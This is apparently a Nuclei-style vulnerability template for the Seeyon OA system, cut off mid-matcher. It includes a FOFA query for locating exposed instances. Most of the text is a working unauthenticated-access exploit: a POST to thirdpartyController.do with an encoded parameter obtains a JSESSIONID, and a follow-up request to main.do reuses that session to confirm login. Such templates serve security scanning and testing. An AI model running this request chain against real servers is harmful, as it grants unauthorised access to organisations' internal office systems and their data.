id: seeyon-unauth info: name: Seeyon Unauthorised Access author: pikpikcu severity: high description: Seeyon is vulnerable to unauthorised access. reference: - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg - https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml metadata: verified: true max-request: 2 fofa-query: app="致远互联-OA" tags: misconfig,seeyon,unauth http: - raw: - | POST /seeyon/thirdpartyController.do HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded Accept-Encoding: deflate method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 - | GET /seeyon/main.do HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: deflate Content-Type: application/x-www-form-urlencoded Cookie: {{session}} extractors: - type: regex name: session part: header internal: true regex: - 'JSESSIONID=(.*)' matchers-condition: and matchers: - type: word part: body words: - "当前已登录了一个用户,同一窗口中不能登录多个用户" - "